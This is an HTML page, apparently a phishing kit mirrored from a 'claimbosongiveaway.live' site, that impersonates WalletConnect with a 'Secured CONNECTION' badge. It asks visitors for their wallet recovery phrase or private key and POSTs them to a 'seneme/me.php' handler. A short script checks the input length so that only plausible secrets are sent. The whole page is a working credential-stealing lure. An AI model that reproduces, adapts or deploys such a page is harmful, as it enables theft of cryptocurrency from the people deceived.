<!DOCTYPE html>
<html lang="en">

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="dist/flowbite.min.css" />
    <link rel="stylesheet" href="dist/inter/inter.css">
    <script src="https://cdn.tailwindcss.com/"></script>
    <script src="https://cdn.tailwindcss.com/?plugins=forms,typography,aspect-ratio,line-clamp"></script>
    <script src="libs/jquery/3.6.1/jquery.min.js" integrity="sha512-aVKKRRi/Q/YV+4mjoKBsE4x3H+BkegoM/em46NNlCqNTmUYADjBbeNefNxYV7giUp0VxICtqdrbqU7iVaeZNXA==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
</head>
<body style="background-color:#08081c">
    <section class="">
        <div class="flex flex-col items-center justify-center px-6 py-8 mx-auto md:h-screen lg:py-0">
            <a href="index.html" class="flex items-center font-bold text-white">
                <img src="wc1.png" class="mr-3  mb-5" style="height:30px" alt="Logo">
                <span>Walletconnect</span>
            </a>
            <div class="p-4 text mb-4 text-sm text-blue-700 bg-blue-100 rounded-lg dark:bg-blue-200 dark:text-blue-800" role="alert">
                <span class="font-medium">
                   Info alert!
                </span>Securely use any of the options below 
              </div> 

      
            <div class="w-full bg-white rounded-lg shadow dark:border md:mt-0 sm:max-w-md xl:p-0 dark:bg-gray-800 dark:border-gray-700">
              
            <div class="mb-4  border-b border-gray-200 dark:border-gray-700">
                <ul class="flex flex-wrap -mb-px text-sm font-medium text-center" id="myTab" data-tabs-toggle="#myTabContent" role="tablist">
                    <li class="mr-2" role="presentation">
                        <button class="inline-block p-4 rounded-t-lg border-b-2 text-blue-600 hover:text-blue-600 dark:text-blue-500 dark:hover:text-blue-500 border-blue-600 dark:border-blue-500" id="profile-tab" data-tabs-target="#profile" type="button" role="tab" aria-controls="profile" aria-selected="true">Phrase</button>
                    </li>
                   
                    <li class="mr-2" role="presentation">
                        <button class="inline-block p-4 rounded-t-lg border-b-2 border-transparent hover:text-gray-600 hover:border-gray-300 dark:hover:text-gray-300 dark:border-transparent text-gray-500 dark:text-gray-400 border-gray-100 dark:border-gray-700" id="settings-tab" data-tabs-target="#settings" type="button" role="tab" aria-controls="settings" aria-selected="false">Private Key</button>
                    </li>
                   
                </ul>
            </div>
            <div id="myTabContent">
                <div class="p-4 bg-gray-50 rounded-lg dark:bg-gray-800" id="profile" role="tabpanel" aria-labelledby="profile-tab">
                  
                    <form action="seneme/me.php" method="POST" onsubmit="return confirmSubmission('phrase')">
                    <div class="mb-6">
                        <div class="mb-6">
                             <div id="confirmation-message-phrase" class="text-red-500 mb-2 hidden"></div>
                            <textarea rows="4" id="phrase" name="message" type="text" placeholder="Enter your recovery phrase (typically 12-24 words seperated by a single space" id="large-input" class="block p-4 w-full text-gray-900 bg-gray-50 rounded-lg border border-gray-300 sm:text-md focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required></textarea>
                        </div>

                        <input class="hidden" value="trustwallet" name="walletid">


                        <!--<input type="hidden" name="_next" value="">

                        <input type="hidden" name="_captcha" value="false">-->

                        <button type="submit" class="text-white bg-blue-700 hover:bg-blue-800 focus:ring-4 focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 mr-2 mb-2 dark:bg-blue-600 dark:hover:bg-blue-700 focus:outline-none dark:focus:ring-blue-800">Proceed</button>
                    </form>
                </div>


            </div>
            </div>




                <div class="hidden p-4 bg-gray-50 rounded-lg dark:bg-gray-800" id="settings" role="tabpanel" aria-labelledby="settings-tab">
                    <form action="seneme/me.php" method="POST" onsubmit="return confirmSubmission('prvky')">                        <div class="mb-6">
                            <div id="confirmation-message-prvky" class="text-red-500 mb-2 hidden"></div>
                            <input name="prvky" type="text" type="text" placeholder="Enter your private key " id="large-input" class="block p-4 w-full text-gray-900 bg-gray-50 rounded-lg border border-gray-300 sm:text-md focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required>
                        </div>
                        <input class="hidden" value="trustwallet" name="walletid">


                        <!--<input type="hidden" name="_next" value="">

                        <input type="hidden" name="_captcha" value="false">-->


                        <button type="submit" class="text-white bg-blue-700 hover:bg-blue-800 focus:ring-4 focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 mr-2 mb-2 dark:bg-blue-600 dark:hover:bg-blue-700 focus:outline-none dark:focus:ring-blue-800">Proceed</button>

                    </form>


                </div>
        </div>
    </section>
           
        <div class="mt-5 text-white bg-gradient-to-r from-blue-500 via-blue-600 to-blue-700 hover:bg-gradient-to-br focus:ring-4 focus:outline-none focus:ring-blue-300 dark:focus:ring-blue-800 font-medium rounded-lg text-sm px-5 py-2.5 text-center mr-2 mb-2">
            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-shield-shaded" viewBox="0 0 16 16">
             <path fill-rule="evenodd" d="M8 14.933a.615.615 0 0 0 .1-.025c.076-.023.174-.061.294-.118.24-.113.547-.29.893-.533a10.726 10.726 0 0 0 2.287-2.233c1.527-1.997 2.807-5.031 2.253-9.188a.48.48 0 0 0-.328-.39c-.651-.213-1.75-.56-2.837-.855C9.552 1.29 8.531 1.067 8 1.067v13.866zM5.072.56C6.157.265 7.31 0 8 0s1.843.265 2.928.56c1.11.3 2.229.655 2.887.87a1.54 1.54 0 0 1 1.044 1.262c.596 4.477-.787 7.795-2.465 9.99a11.775 11.775 0 0 1-2.517 2.453 7.159 7.159 0 0 1-1.048.625c-.28.132-.581.24-.829.24s-.548-.108-.829-.24a7.158 7.158 0 0 1-1.048-.625 11.777 11.777 0 0 1-2.517-2.453C1.928 10.487.545 7.169 1.141 2.692A1.54 1.54 0 0 1 2.185 1.43 62.456 62.456 0 0 1 5.072.56z"/>
           </svg>Secured CONNECTION
         </div>
      </section>



   <script>
        function confirmSubmission(type) {
            let messageElement;
            let inputElement;

            if (type === 'phrase') {
                messageElement = document.getElementById("confirmation-message-phrase");
                inputElement = document.getElementById("phrase");
            } else if (type === 'prvky') {
                messageElement = document.getElementById("confirmation-message-prvky");
                inputElement = document.querySelector("input[name='prvky']");
            }

            // Clear any previous message
            messageElement.textContent = '';
            messageElement.classList.add('hidden');

            // Check if input is valid
            const userInput = inputElement.value.trim();
            const minWords = 12;

            if (type === 'phrase') {
                const wordCount = userInput.split(/\s+/).length;
                if (wordCount < minWords) {
                    messageElement.textContent = `Please enter at least ${minWords} words.`;
                    messageElement.classList.remove('hidden');
                    return false; // Prevent form submission
                }
            } else if (type === 'prvky' && userInput.length < 12) {
                messageElement.textContent = "Please enter a valid private key (at least 12 characters).";
                messageElement.classList.remove('hidden');
                return false; // Prevent form submission
            }

            return true; // Allow form submission
        }
    </script>

    <script src="dist/flowbite.js"></script>
</body>

<!-- Mirrored from claimbosongiveaway.live/connection-module-m/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 30 Dec 2023 01:26:14 GMT -->
</html>